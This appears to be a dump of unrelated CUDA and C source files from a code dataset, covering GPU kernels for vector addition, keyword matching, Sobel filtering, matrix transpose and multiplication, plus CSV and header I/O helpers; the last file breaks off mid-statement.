#include "includes.h" __global__ void add(int *a, int *b, int *c) { //blockDim is num threads/block, multiplied by block number to index to one of them, then select thread inside block via thread Id int threadID = threadIdx.x + blockIdx.x * blockDim.x; //Max 65 535 blocks, with 512 threads each ~ 8 million elements, if vector exceeds that amount require a soln //Run arbitrary number of blocks and threads //Done at each parallel process, allows a single launch of threads to iteratively cycle through all available indices of vector //As long as each thread begins at a unique index-val, all will iterate arr without affecting one another while (threadID < N) { c[threadID] = a[threadID] + b[threadID]; //Add threadID += blockDim.x * gridDim.x; } }
21,471
#include <stdlib.h> #include <stdio.h> #include <string.h> #include <math.h> #include <ctime> // Includes CUDA #include <cuda_runtime.h> #define LINEWIDTH 20 #define NWORDS 32 #define CUDA_STREAMS 1 #define BLOCK_SIZE 32 #define TITLE_SIZE 4 int length; int len; int nwords; int matches[NWORDS]; char *ctext; char keywords[NWORDS][LINEWIDTH]; unsigned int *text; unsigned int *words; float cpuRunTime; // citation: https://stackoverflow.com/questions/14038589/what-is-the-canonical-way-to-check-for-errors-using-the-cuda-runtime-api #define checkCudaErrors(ans) { gpuAssert((ans), __FILE__, __LINE__); } inline void gpuAssert(cudaError_t code, const char *file, int line, bool abort=true) { if (code != cudaSuccess) { fprintf(stderr,"GPUassert: %s %s %d\n", cudaGetErrorString(code), file, line); if (abort) exit(code); } } void intialise(char *input) { nwords = NWORDS; printf("-----------\nGoint to read %s\n", input); char *line; line = (char*) malloc(sizeof(char)*LINEWIDTH); memset(matches, 0, sizeof(matches)); // read in text and keywords for processing FILE *fp, *wfile; wfile = fopen("./data/keywords.txt","r"); if (!wfile) { printf("keywords.txt: File not found.\n"); exit(0);} int k=0, cnt = nwords; size_t read, linelen = LINEWIDTH; while((read = getline(&line, &linelen, wfile)) != -1 && cnt--) { strncpy(keywords[k], line, sizeof(line)); keywords[k][4] = '\0'; k++; } fclose(wfile); fp = fopen(input,"r"); if (!fp) { printf("Unable to open the file.\n"); exit(0);} length = 0; while (getc(fp) != EOF) length++; ctext = (char *)malloc(length+4); rewind(fp); for (int l=0; l<length; l++) ctext[l] = getc(fp); for (int l=length; l<length+4; l++) ctext[l] = ' '; fclose(fp); printf("Length : %d\n", length ); // define number of words of text, and set pointers len = length/4; text = (unsigned int *) ctext; // define words for matching words = (unsigned int *)malloc(nwords*sizeof(unsigned int)); for (int w=0; w<nwords; w++) { words[w] = ((unsigned int) keywords[w][0]) + ((unsigned int) keywords[w][1])*(1<<8) + ((unsigned int) keywords[w][2])*(1<<16) + ((unsigned int) keywords[w][3])*(1<<24); } } void deinit(){ free(words); free(text); } void check_matches(int *temp_matches){ bool isRight = true; for(int i = 0; i<nwords; i++) { if(matches[i] != temp_matches[i]) { isRight = false; printf("WRONG OUTPUT:\t %s\t|\t%d\n", keywords[i], temp_matches[i]); } } if(isRight) { printf(" - Correct Answer -\n"); } } void print_matches(int *temp_matches){ printf("Printing Matches:\n"); printf("Word\t |\tNumber of Matches\n===================================\n"); for (int i = 0; i < nwords; ++i) printf("%s\t |\t%d\n", keywords[i], temp_matches[i]); } void matchPattern_CPU(unsigned int *text, unsigned int *words, int *matches, int nwords, int length) { unsigned int word; for (int l=0; l<length; l++) { for (int offset=0; offset<4; offset++) { if (offset==0) word = text[l]; else word = (text[l]>>(8*offset)) + (text[l+1]<<(32-8*offset)); for (int w=0; w<nwords; w++){ matches[w] += (word==words[w]); } } } } void exec_CPU(){ // CPU execution const clock_t begin_time = clock(); matchPattern_CPU(text, words, matches, nwords, len); cpuRunTime = (float)( clock() - begin_time ) / CLOCKS_PER_SEC; printf("CPU exec time: %f s\n\n", cpuRunTime); } __global__ void matchPattern_gpu_1(const unsigned int *text, const unsigned int *words, int *matches, int nwords, int length) { int tid = threadIdx.x; int idx = blockIdx.x * blockDim.x + tid; // for loading text into the shared memory __shared__ unsigned int text_s[(TITLE_SIZE*NWORDS) + TITLE_SIZE]; #pragma unroll for(int x = 0; x<TITLE_SIZE; x++){ text_s[tid + (x*NWORDS) + x] = text[idx+(x*blockDim.x*gridDim.x)]; text_s[((x+1)*NWORDS) + x] = text[(x*blockDim.x*gridDim.x) + (blockIdx.x * blockDim.x) + blockDim.x]; } // loads the keyword for this thread // each thread in a block is reponsible for one keyword unsigned int keyword = words[tid]; __syncthreads(); unsigned int word; int sum = 0; // go through all the words in the shared memory #pragma unroll for(int x = 0; x<TITLE_SIZE; x ++) { #pragma unroll for(int w = (x*NWORDS) + x; w < ((x+1)*NWORDS) + (x); w++) { #pragma unroll for (int offset=0; offset<4; offset++) { word = offset==0 ? text_s[w] : (text_s[w]>>(8*offset)) + (text_s[w+1]<<(32-8*offset)); sum = sum + (word==keyword); } } } atomicAdd(&matches[tid],sum); } void exec_gpu_simple(){ // GPU execution unsigned int *d_text; unsigned int *d_words; int *d_matches; int *h_matches; h_matches = (int *)malloc(nwords*sizeof(int)); checkCudaErrors(cudaMalloc((void**)&d_words, nwords*sizeof(unsigned int))); checkCudaErrors(cudaMalloc((void**)&d_matches, nwords*sizeof(int))); checkCudaErrors(cudaMalloc((void**)&d_text, sizeof(char)*strlen(ctext))); cudaEvent_t start,stop; float time_H2D,time_D2H,time_kernel; checkCudaErrors(cudaEventCreate(&start)); checkCudaErrors(cudaEventCreate(&stop)); // MEMCOPY cudaEventRecord(start, 0); checkCudaErrors(cudaMemcpy(d_words, words, nwords*sizeof(unsigned int), cudaMemcpyHostToDevice)); checkCudaErrors(cudaMemcpy(d_text, text, sizeof(char)*strlen(ctext), cudaMemcpyHostToDevice)); cudaEventRecord(stop,0); cudaEventSynchronize(stop); cudaEventElapsedTime(&time_H2D,start,stop); printf("HostToDevice memcopy time: %fs\n", time_H2D/1000); // RUN KERNEL cudaEventRecord(start, 0); matchPattern_gpu_1<<< ceil((float)len/(TITLE_SIZE*NWORDS)),NWORDS>>>(d_text, d_words, d_matches, nwords, len); cudaEventRecord(stop,0); cudaEventSynchronize(stop); checkCudaErrors(cudaPeekAtLastError()); cudaEventElapsedTime(&time_kernel,start,stop); printf("Kernel execution time: %fs\n", time_kernel/1000); cudaEventRecord(start, 0); checkCudaErrors(cudaMemcpy(h_matches, d_matches, nwords*sizeof(int), cudaMemcpyDeviceToHost)); cudaEventRecord(stop,0); cudaEventSynchronize(stop); cudaEventElapsedTime(&time_D2H,start,stop); printf("DeviceToHost memcopy time: %fs\n", time_D2H/1000); printf("Total memcopy time: %fs\n", (time_D2H+time_H2D)/1000); printf("Total memcopy+kernel time: %fs\n", (time_D2H+time_H2D+time_kernel)/1000); printf("Speedup without memory: %f\n", cpuRunTime/((time_kernel)/1000)); printf("Speedup with memory: %f\n", cpuRunTime/((time_D2H + time_H2D + time_kernel)/1000)); check_matches(h_matches); cudaEventDestroy(start); cudaEventDestroy(stop); free(h_matches); cudaFree(d_words); cudaFree(d_matches); cudaFree(d_text); } int main(int argc, const char **argv) { intialise("./data/small.txt"); exec_CPU(); exec_gpu_simple(); intialise("./data/medium.txt"); exec_CPU(); exec_gpu_simple(); intialise("./data/large.txt"); exec_CPU(); exec_gpu_simple(); deinit(); }
21,472
#include "includes.h" __global__ void fill(float * w, float val, int size) { const int tid = (blockIdx.x * blockDim.x) + threadIdx.x; if (tid < size) w[tid] = val; }
21,473
// ------------------- // Generic // ------------------- __global__ void indexShiftDown(int *d_rows, const int m){ unsigned int xIndex = blockDim.x * blockIdx.x + threadIdx.x; if (xIndex < m) d_rows[xIndex] = d_rows[xIndex]-1; } __global__ void indexShiftUp(int *d_rows, const int m){ unsigned int xIndex = blockDim.x * blockIdx.x + threadIdx.x; if (xIndex < m) d_rows[xIndex] = d_rows[xIndex]+1; } __global__ void fill(int *vec, int value, int n){ unsigned int xIndex = blockDim.x * blockIdx.x + threadIdx.x; if (xIndex < n) vec[xIndex]=value; } // ------------------- // Boundary matrix and PH set-up & preprocessing // ------------------- __global__ void create_rows_mp(int *d_rows, int *d_cols, int *d_rows_mp, int m, int p, int nnz){ int tid = threadIdx.x + blockDim.x*blockIdx.x; // We assume col major order if(tid < nnz){ // tid == col if (tid == 0 || d_cols[tid] != d_cols[tid-1]){ int i = 0; int col = d_cols[tid]; while ((tid+i < nnz) && col == d_cols[tid+i]){ d_rows_mp[col*p+i] = d_rows[tid+i]; i++; } } } } __global__ void compute_low(int *d_rows_mp, int *d_low, int m, int p){ int tid = threadIdx.x + blockDim.x*blockIdx.x; // We assume col major order if(tid < m){ int low = -1; int idx = tid*p; int idx_MAX = (tid+1)*p; while (idx < idx_MAX && d_rows_mp[idx] != -1){ low = d_rows_mp[idx++]; } d_low[tid] = low; } } __global__ void compute_ess_true(int *d_low_true, int *d_ess_true, int m){ int j = threadIdx.x + blockDim.x*blockIdx.x; if(j < m){ if (d_low_true[j] > -1){ d_ess_true[j] = 0; d_ess_true[d_low_true[j]] = 0; } } }
21,474
#include "includes.h" #define BLOCK_SIZE 16 #define HEADER_SIZE 122 #define BLOCK_SIZE_SH 18 typedef unsigned char BYTE; /** * Structure that represents a BMP image. */ typedef struct { int width; int height; float *data; } BMPImage; typedef struct timeval tval; BYTE g_info[HEADER_SIZE]; // Reference header /** * Reads a BMP 24bpp file and returns a BMPImage structure. * Thanks to https://stackoverflow.com/a/9296467 */ __device__ float gpu_applyFilter(float *image, int stride, float *matrix, int filter_dim) { //////////////// // TO-DO #5.2 //////////////////////////////////////////////// // Implement the GPU version of cpu_applyFilter() // // // // Does it make sense to have a separate gpu_applyFilter()? // ////////////////////////////////////////////////////////////// float pixel = 0.0f; for (int h = 0; h < filter_dim; h++) { int offset = h * stride; int offset_kernel = h * filter_dim; for (int w = 0; w < filter_dim; w++) { pixel += image[offset + w] * matrix[offset_kernel + w]; } } return pixel; } __global__ void gpu_sobel(int width, int height, float *image, float *image_out) { //////////////// // TO-DO #6.1 ///////////////////////////////////// // Implement the GPU version of the Sobel filter // /////////////////////////////////////////////////// float sobel_x[9] = { 1.0f, 0.0f, -1.0f, 2.0f, 0.0f, -2.0f, 1.0f, 0.0f, -1.0f }; float sobel_y[9] = { 1.0f, 2.0f, 1.0f, 0.0f, 0.0f, 0.0f, -1.0f, -2.0f, -1.0f }; const int index_x = blockIdx.x*blockDim.x + threadIdx.x; const int index_y = blockIdx.y*blockDim.y + threadIdx.y; __shared__ float sh_block[BLOCK_SIZE_SH * BLOCK_SIZE_SH]; if (index_x < (width - 2) && index_y < (height - 2)) { int offset_t = index_y * width + index_x; int offset = (index_y + 1) * width + (index_x + 1); int offset_shared = threadIdx.y * BLOCK_SIZE_SH + threadIdx.x; sh_block[offset_shared] = image[offset_t]; __syncthreads(); if((threadIdx.y == BLOCK_SIZE - 1)) { sh_block[offset_shared + BLOCK_SIZE_SH] = image[offset_t + width]; sh_block[offset_shared + BLOCK_SIZE_SH*2] = image[offset_t + 2*width]; } __syncthreads(); if((threadIdx.x == BLOCK_SIZE - 1)) { sh_block[offset_shared + 1] = image[offset_t + 1]; sh_block[offset_shared + 2] = image[offset_t + 2]; } __syncthreads(); if((threadIdx.y == BLOCK_SIZE - 1) && (threadIdx.x == BLOCK_SIZE - 1)) { sh_block[offset_shared + BLOCK_SIZE_SH + 1] = image[offset_t + width + 1]; sh_block[offset_shared + BLOCK_SIZE_SH*2 + 1] = image[offset_t + width*2 + 1]; sh_block[offset_shared + BLOCK_SIZE_SH + 2] = image[offset_t + width + 2]; sh_block[offset_shared + BLOCK_SIZE_SH*2 + 2] = image[offset_t + width*2 + 2]; } __syncthreads(); float gx = gpu_applyFilter(&sh_block[offset_shared], BLOCK_SIZE_SH, sobel_x, 3); float gy = gpu_applyFilter(&sh_block[offset_shared], BLOCK_SIZE_SH, sobel_y, 3); // Note: The output can be negative or exceed the max. color value // of 255. We compensate this afterwards while storing the file. image_out[offset] = sqrtf(gx * gx + gy * gy); } }
21,475
#include <stdio.h> #include <errno.h> #include <arpa/inet.h> #include <unistd.h> #include <string.h> #include "cs_header.h" int cs_put_header( int fd, char coding, char opt, char m, int x, int y, int xb, int yb, int zb, int xc0, int yc0, int zc0, int xc1, int yc1, int zc1, int xc2, int yc2, int zc2, int xo, int yo, int zo, int xe, int ye, int ze, int xa, int ya, int edge_x, int edge_y, int md_x, int md_y, int md_z, int weight ) { int i ; struct cs_header csh ; memset( &csh, 0, sizeof( csh )) ; csh.coding = coding ; csh.coding_opt = opt ; csh.matrix = m ; csh.frame.x = htonl( x ); csh.frame.y = htonl( y ); csh.block.x = htonl( xb ); csh.block.y = htonl( yb ); csh.block.z = htonl( zb ); csh.select[0].x = htonl( xc0 ); csh.select[0].y = htonl( yc0 ); csh.select[0].z = htonl( zc0 ); csh.select[1].x = htonl( xc1 ); csh.select[1].y = htonl( yc1 ); csh.select[1].z = htonl( zc1 ); csh.select[2].x = htonl( xc2 ); csh.select[2].y = htonl( yc2 ); csh.select[2].z = htonl( zc2 ); csh.overlap.x = htonl( xo ); csh.overlap.y = htonl( yo ); csh.overlap.z = htonl( zo ); csh.expand.x = htonl( xe ); csh.expand.y = htonl( ye ); csh.expand.z = htonl( ze ); csh.md.x = htonl( md_x ); csh.md.y = htonl( md_y ); csh.md.z = htonl( md_z ); csh.edge.x = htonl( edge_x ); csh.edge.y = htonl( edge_y ); csh.append.x = htonl( xa ); csh.append.y = htonl( ya ); csh.weight = htons( weight ) ; i = write ( fd, &csh, sizeof ( csh )) ; if ( i != sizeof ( csh )) { fprintf( stderr, "cs_put_header failed errno %d\n", errno ) ; return ( 0 ) ; } return ( 1 ) ; } int cs_get_header( int fd, struct cs_header *cshp ) { int i ; i = read ( fd, cshp, sizeof ( *cshp )) ; if ( i != sizeof ( *cshp )) { fprintf( stderr, "cs_get_header failed errno %d\n", errno ) ; return ( 0 ) ; } cshp->frame.x = ntohl( cshp->frame.x ); cshp->frame.y = ntohl( cshp->frame.y ); cshp->block.x = ntohl( cshp->block.x ); cshp->block.y = ntohl( cshp->block.y ); cshp->block.z = ntohl( cshp->block.z ); for ( i = 0 ; i < CUBE_INFO_CNT ; i++ ) { cshp->select[i].x = ntohl( cshp->select[i].x ); cshp->select[i].y = ntohl( cshp->select[i].y ); cshp->select[i].z = ntohl( cshp->select[i].z ); } cshp->overlap.x = ntohl( cshp->overlap.x ); cshp->overlap.y = ntohl( cshp->overlap.y ); cshp->overlap.z = ntohl( cshp->overlap.z ); cshp->expand.x = ntohl( cshp->expand.x ); cshp->expand.y = ntohl( cshp->expand.y ); cshp->expand.z = ntohl( cshp->expand.z ); cshp->append.x = ntohl( cshp->append.x ); cshp->append.y = ntohl( cshp->append.y ); cshp->md.x = ntohl( cshp->md.x ); cshp->md.y = ntohl( cshp->md.y ); cshp->md.z = ntohl( cshp->md.z ); cshp->edge.x = ntohl( cshp->edge.x ); cshp->edge.y = ntohl( cshp->edge.y ); cshp->weight = ntohs( cshp->weight ) ; return ( 1 ) ; } int cs_put_block_header( int fd, int random_l, int random_r ) { int i ; struct cs_block_header csh ; memset( &csh, 0, sizeof( csh )) ; csh.random_l = htonl( random_l ) ; csh.random_r = htonl( random_r ) ; i = write ( fd, &csh, sizeof ( csh )) ; if ( i != sizeof ( csh )) { fprintf( stderr, "cs_put_block_header failed errno %d\n", errno ) ; return ( 0 ) ; } return ( 1 ) ; } int cs_get_block_header( int fd, struct cs_block_header *cshp ) { int i ; i = read ( fd, cshp, sizeof ( *cshp )) ; if ( i != sizeof ( *cshp )) { fprintf( stderr, "cs_get_block_header failed errno %d\n", errno ) ; return ( 0 ) ; } cshp->random_l = ntohl( cshp->random_l ); cshp->random_r = ntohl( cshp->random_r ); return ( 1 ) ; }
21,476
#include "includes.h" __global__ void ComputeInternalEnergy_kernel(float *Rho, float *Vx, float *Vy, float *Vz, float *Etot, float *Eneint, float *Bx, float *By, float *Bz, int size) { // get thread and block index const long tx = threadIdx.x; const long bx = blockIdx.x; const long by = blockIdx.y; int igrid = tx + bx*CUDA_BLOCK_SIZE + by*CUDA_BLOCK_SIZE*CUDA_GRID_SIZE; if (igrid >= size) return; // compute internal energy Eneint[igrid] = Etot[igrid] - 0.5*(Vx[igrid]*Vx[igrid] + Vy[igrid]*Vy[igrid] + Vz[igrid]*Vz[igrid]) - 0.5*(Bx[igrid]*Bx[igrid] + By[igrid]*By[igrid] + Bz[igrid]*Bz[igrid])/Rho[igrid]; }
21,477
#include <cuda.h> int main(void){ }
21,478
// // Created by root on 2020/11/19. // #include "stdio.h" #include "cuda_runtime.h" #define BDIMX 32 #define BDIMY 32 __global__ void transposeNaiveGem(int *in, int *out, int nx, int ny) { int x = threadIdx.x + blockIdx.x * blockDim.x; int y = threadIdx.y + blockIdx.y * blockDim.y; if (x < nx && y < ny) { out[x * ny + y] = in[y * nx + x]; } } __global__ void transposeNaiveGem2(int *in, int *out, int nx, int ny) { int x = threadIdx.x + blockIdx.x * blockDim.x; int y = threadIdx.y + blockIdx.y * blockDim.y; if (x < nx && y < ny) { out[y * nx + x] = in[x * ny + y]; // store is combined but load not // Bytes count per request in Pascal seems lower than 128 } } __global__ void transposeSmem(int *in, int *out, int nx, int ny) { int ix = blockIdx.x * blockDim.x + threadIdx.x; // thread x coordinate in block(origin matrix) int iy = blockIdx.y * blockDim.y + threadIdx.y; // thread y coordinate in block(origin matrix) __shared__ int tile[BDIMX][BDIMY]; // __shared__ int tile[BDIMX][BDIMY + 1]; // We can append one column per row to eliminate store bank conflict int ti = iy * nx + ix; // thread data index in matrix / coordinate in origin matrix int bidx = threadIdx.y * blockDim.x + threadIdx.x; // thread index in block int irow = bidx / blockDim.y; // row of current thread in block int icol = bidx % blockDim.y; // column of current thread in block ix = blockIdx.y * blockDim.y + icol; // x coordinate in transpose matrix iy = blockIdx.x * blockDim.x + irow; // y coordinate in transpose matrix int to = iy * ny + ix; // coordinate in transpose matrix if (ix < nx && iy < ny) { tile[threadIdx.x][threadIdx.y] = in[ti]; // We got bank conflict here, but both the throughput and speed are still higher than global memory __syncthreads(); out[to] = tile[irow][icol]; // Just change the index of data in array } } __global__ void transposeSmemUnrollPad(int *in, int *out, int nx, int ny) { int ix = blockDim.x * blockIdx.x * 2 + threadIdx.x; // thread start x index in block int iy = blockDim.y * blockIdx.y + threadIdx.y; // thread start y index in block __shared__ int tile[BDIMX * 2][BDIMY + 1]; int ti = iy * nx + ix; // start data index in block int bidx = threadIdx.y * blockDim.x + threadIdx.x; // thread start index in block int irow = bidx / blockDim.x; // row in origin matrix int icol = bidx % blockDim.x; // column in origin matrix int outputIndex = ix * ny + blockIdx.y * BDIMY + irow; // data index in the output array if (icol < nx && irow < ny) { tile[icol][irow] = in[ti]; __syncthreads(); out[outputIndex] = tile[icol][irow]; } if (icol + blockDim.x < nx && irow < ny) { tile[icol + blockDim.x][irow] = in[ti + blockDim.x]; __syncthreads(); out[outputIndex + blockDim.x * ny] = tile[icol + blockDim.x][irow]; } } int main() { int nx = 1024, ny = 1024; int nBytes = nx * ny * sizeof(int); int *h_in = (int *) malloc(nBytes); int *h_out = (int *) malloc(nBytes); for (int i = 0; i < nx * ny; i++) { h_in[i] = i; } int *d_in; int *d_out; cudaMalloc(&d_in, nBytes); cudaMalloc(&d_out, nBytes); cudaMemcpy(d_in, h_in, nBytes, cudaMemcpyHostToDevice); dim3 blockDim(BDIMX, BDIMY); dim3 gridDim((nx + blockDim.x - 1) / blockDim.x, (ny + blockDim.y - 1) / blockDim.y); transposeNaiveGem<<<gridDim, blockDim>>>(d_in, d_out, nx, ny); cudaDeviceSynchronize(); cudaMemcpy(h_out, d_out, nBytes, cudaMemcpyDeviceToHost); // for (int i = 0; i < nx * ny; i++) { // printf("%d->", h_out[i]); // } // // printf("\n====================\n"); memset(h_out, 0, nBytes); cudaMemset(d_out, 0, nBytes); dim3 blockDim_(BDIMX, BDIMY); dim3 gridDim_((nx + 2 * blockDim_.x - 1) / (2 * blockDim_.x), (ny + blockDim_.y - 1) / blockDim_.y); printf("grid_: (%d, %d), block_: (%d, %d)\n", gridDim_.x, gridDim_.y, blockDim_.x, blockDim_.y); transposeSmemUnrollPad<<<gridDim_, blockDim_>>>(d_in, d_out, nx, ny); cudaDeviceSynchronize(); cudaMemcpy(h_out, d_out, nBytes, cudaMemcpyDeviceToHost); // for (int i = 0; i < nx * ny; i++) { // printf("%d->", h_out[i]); // } // // printf("\n====================\n"); memset(h_out, 0, nBytes); cudaMemset(d_out, 0, nBytes); transposeSmem<<<gridDim, blockDim>>>(d_in, d_out, nx, ny); cudaDeviceSynchronize(); cudaMemcpy(h_out, d_out, nBytes, cudaMemcpyDeviceToHost); // for (int i = 0; i < nx * ny; i++) { // printf("%d->", h_out[i]); // } memset(h_out, 0, nBytes); cudaMemset(d_out, 0, nBytes); transposeSmem<<<gridDim, blockDim>>>(d_in, d_out, nx, ny); cudaDeviceSynchronize(); cudaMemcpy(h_out, d_out, nBytes, cudaMemcpyDeviceToHost); // for (int i = 0; i < nx * ny; i++) { // printf("%d->", h_out[i]); // } cudaFree(d_in); cudaFree(d_out); free(h_in); free(h_out); }
21,479
#include <stdio.h> #include <errno.h> #include <unistd.h> #include <string.h> extern int errno; /* Function that saves the Image */ void writeImg(char *in_filename,float *data, int dataRows,int attributes){ FILE *fp; int counter=1; char delim = ','; char *filename; filename = strtok(in_filename,"."); filename = strcat(filename,"_out.csv"); /* Check if the out file existsi and find an appropriate name that is unique*/ while (access(filename,F_OK) == 0){ filename = strtok(filename,"_"); filename = strcat(filename,"_out"); char num[100]; sprintf(num,"%d",counter); counter++; filename = strcat(filename, num); filename = strcat(filename,".csv"); } /* Open File */ fp = fopen(filename,"w"); /* Write contents */ for (int i=0;i<dataRows;i++){ for (int j=0;j<attributes;j++){ /* If writing the last element of the row skip the delimiter and add new line instead*/ if ( j == attributes-1) fprintf(fp,"%f\n",data[i * attributes +j]); else fprintf(fp,"%f%c",data[i * attributes +j],delim); } } /* Close File*/ fclose(fp); } /* Function that checks the number of arguments */ void checkArgsNum(int num,int argc){ num++; // Add 1 to offset if (num == argc ) return; else if (argc == 1 ){ fprintf(stderr, "Line:%d No argument was given\n",__LINE__); exit(EXIT_FAILURE); } else if (argc < num && argc > 1){ fprintf(stderr, "Line:%d Less arguments was given\n",__LINE__); exit(EXIT_FAILURE); } else if (argc > num){ fprintf(stderr, "Line:%d More args given\n",__LINE__); exit(EXIT_FAILURE); } } /* Check if patch size given as an argument is an odd number */ void checkPatchSize(int patchSize){ if ( (patchSize % 2)!=1){ fprintf(stderr, "Line:%d Patch Size is not odd number\n",__LINE__); exit(EXIT_FAILURE); } } /* Helper function that gets the number of attributes in the csv file */ int getAttributes(FILE *fp){ /* Variables */ char buf[8192]; int attributes=0; char delim=','; /* Get first line from file */ /* and check if file is empty */ if (fgets(buf,8192,fp)==NULL){ fprintf(stderr,"Line %d: Input file empty\n",__LINE__ ); exit(EXIT_FAILURE); } /* Count the occurences of the delimiters */ for(int i=0;i<strlen(buf);i++){ if (buf[i]==delim) attributes++; } /* Add 1 to the occurrences of the delimiter */ attributes++; /* Rewind fp */ rewind(fp); return attributes; } /* Function that reads csv files and returns a 2d array */ float ** readCSV(FILE *fp, float **data, int *dataRows,int *attributes){ /* Variables */ *attributes = getAttributes(fp); const char delim[] = ","; int row=0; char buf[8192]; /* Read Lines one by one and split them on the delimiter */ while(fgets(buf,8192,fp)){ /* realloc the data array to fill another row */ data = (float **)realloc(data,(row+1)*sizeof(float *)); data[row] = (float *)malloc(*attributes*(sizeof(float))); /* Split the buf on the delimiter and fill the row */ char *token; for (int i = 0; i< *attributes; i++){ if (i==0) token = strtok(buf,delim); else token = strtok(NULL,delim); /* If token NULL no more lines exist (Maybe there is no need for this) */ if (token==NULL) break; /* Covert str to float */ sscanf(token, "%f",&data[row][i]); } row++; } /* Return dataRows */ *dataRows=row; rewind(fp); return data; } /* Wrapper function that calls the pre-existing readCSV and returns the data as a 1D array */ float * getImg( char *filename, int *dataRows, int *attributes ){ FILE *fp; /* Open file */ fp= fopen (filename,"r"); if (fp == NULL){ fprintf(stderr, "Line %d: Error opening file %s\n",__LINE__,strerror(errno)); exit (EXIT_FAILURE); } /* Read csv */ float **data2D= (float **)malloc(0); data2D=readCSV(fp,data2D,dataRows,attributes); /* Make 2D array to 1D */ float *data1D = (float *)malloc(*attributes * (*dataRows) * sizeof(float)); for (int i=0;i<(*dataRows);i++) for (int j=0;j<(*attributes);j++) data1D[i*(*attributes) + j] = data2D[i][j]; /* Free data memory*/ int RowsToFree=*dataRows; while(RowsToFree) free(data2D[-- RowsToFree]); free(data2D); /* Close file */ fclose(fp); return data1D; }
21,480
#include <stdio.h> #include <cuda.h> #include <time.h> #include <stdlib.h> #include <string.h> __global__ void mul( float *Ad, float *Bd, float *Cd, int msize, int tile, int task); int main( int argc, char **argv){ // argv[0]: name, argv[1]: msize, argv[2]: tile_width/ per block, argv[3]: task per thread, argv[4]: isVerification clock_t start = clock(); int i, j; int msize = atoi(argv[1]); int tile = atoi(argv[2]); int task = atoi(argv[3]); float *A, *B, *C; float *Ad, *Bd, *Cd; A = (float*)malloc(msize * msize * sizeof(float)); B = (float*)malloc(msize * msize * sizeof(float)); C = (float*)malloc(msize * msize * sizeof(float)); // for verification if( argc == 5){ for( i = 0; i < msize; i++){ for( j = 0; j < msize; j++){ A[i * msize + j] = (float)1; B[i * msize + j] = (float)1; } } } else{ for( i = 0; i < msize; i++){ for ( j = 0; j < msize; j++){ srand(time(NULL)); A[ i * msize + j] = (float)(rand()%2); srand(time(NULL)); B[ i * msize + j] = (float)(rand()%2); } } } cudaMalloc((void**)&Ad, msize * msize * sizeof(float)); cudaMalloc((void**)&Bd, msize * msize * sizeof(float)); cudaMalloc((void**)&Cd, msize * msize * sizeof(float)); cudaMemcpy(Ad, A, msize * msize * sizeof(float), cudaMemcpyHostToDevice); cudaMemcpy(Bd, B, msize * msize * sizeof(float), cudaMemcpyHostToDevice); dim3 dimGrid((msize/tile), (msize/tile)); dim3 dimBlock((tile/task), (tile/task)); size_t SharedMemBytes = 2 * tile * msize * sizeof(float); mul<<<dimGrid, dimBlock, SharedMemBytes>>> (Ad, Bd, Cd, msize, tile, task); cudaMemcpy(C, Cd, msize * msize * sizeof(float), cudaMemcpyDeviceToHost); //print out the verification result int beZero = 0; if( argc == 5){ printf("\n=================== V =========================\n"); for ( i = 0; i < msize; i++){ printf("\n"); for( j = 0; j < msize; j++){ printf("%.2f ", C[i * msize + j]); if ( C[i * msize + j] != msize) beZero++; } } if( beZero != 0 ) printf("\n ==========Told you to be steady MAN!=============\n"); else printf("\n GOOD! ONLY ONE MORE TO GO!!! BIG BIG : ) \n"); } free(A); free(B); free(C); cudaFree(Ad);cudaFree(Bd);cudaFree(Cd); printf( " \n msize: %d\t tilewidth: %d\t task: %d\t timeElapsed: %f\n", msize, tile, task, ((double)(clock()-start)/CLOCKS_PER_SEC)); return 1; } __global__ void mul( float *Ad, float *Bd, float *Cd, int msize, int tile, int task){ extern __shared__ float shared[];// first half is for Shared A, second half is for Shared B int tx, ty; int r, c; float Cv; float Av, Bv; int m; for ( tx = 0; tx < task; tx++){ c = blockIdx.x * tile + threadIdx.x * task + tx; for ( ty = 0; ty < task; ty++){ r = blockIdx.y * tile + threadIdx.y * task + ty; Cv = (float)0; Av = Ad[ r * msize]; // initialize Bv = Bd[ c ]; for ( m = 0; m < msize; m++){ shared[ threadIdx.y * task + ty] = Av; // put cur tile to shared mem shared[ tile * msize + threadIdx.x * task + tx] = Bv; __syncthreads(); if( (m + 1) < msize){ Av = Ad[ r * msize + m + 1]; //load next tile to reg Bv = Bd[ m * msize + c]; } Cv += shared[ threadIdx.y * task + ty ] * shared[ tile * msize + threadIdx.x * task + tx]; __syncthreads(); } Cd[ r * msize + c] = Cv; } } }
21,481
#include <stdio.h> __global__ void HelloFromGpu() { int x = threadIdx.x; int bx = blockIdx.x; //if (x == 5) printf("hello world from gpu b:%d, thread %d \n",bx,x); } int main() { HelloFromGpu<<<10,1>>>(); //cudaDeviceReset(); cudaDeviceSynchronize(); return 0; }
21,482
/* * main.cu * * Created on: Nov 14, 2019 * Author: cuda-s01 */ #include <stdio.h> __global__ void matrixMultiplicationKernel(float* M, float* N, float* P, int Width) { // Calculate the row index of the P element and M int Row = blockIdx.y*blockDim.y+threadIdx.y; // Calculate the column index of P and N int Col = blockIdx.x*blockDim.x+threadIdx.x; //debug line: //printf("Row:%d, Col:%d. BlockIdx(%d,%d), blockDim(%d,%d) threadIdx(%d,%d)\n\n",Row,Col,blockIdx.x,blockIdx.y,blockDim.x,blockDim.y,threadIdx.x,threadIdx.y); if ((Row < Width) && (Col < Width)) { float Pvalue = 0; // each thread computes one element of the block sub-matrix for (int k = 0; k < Width; ++k) { Pvalue += M[Row*Width+k]*N[k*Width+Col]; } P[Row*Width+Col] = Pvalue; } else P[Row*Width+Col] = 99.9; } void matrixMultiplication(float *M, float *N, float *P, int Width){ // declare the number of blocks per grid and the number of threads per block int th = Width; int bl = 1; dim3 threadsPerBlock(th,th); dim3 blocksPerGrid(bl,bl); printf("Kernel started: %d blocks, %d threads.\n", bl, th); matrixMultiplicationKernel<<<blocksPerGrid,threadsPerBlock>>>(M, N, P, Width); } void PrintMatrix(float* M, int Width) { for(int i = 0; i < Width; i++) { for(int j = 0; j < Width; j++) printf("%f ",M[i*Width+j]); printf("\n"); } printf("\n"); } int main(void) { printf("Starting the program:\n"); cudaError_t err = cudaSuccess; int matrix_size = 10; int num_of_elements = matrix_size * matrix_size; size_t size = num_of_elements * sizeof(float); printf("matrix [%d x %d] multiplication.\n", matrix_size, matrix_size); //==========================HOST=============================================== //allocate matrixes (two input ones, one output one): //matrix can be represented as a flat vector in the memory - it is so in GPU, //so for simplification of indexation I also use this representation on the host printf("Started variables allocation for the host.\n"); float *M_h = (float *)malloc(size); float *N_h = (float *)malloc(size); float *P_h = (float *)malloc(size); if(M_h == 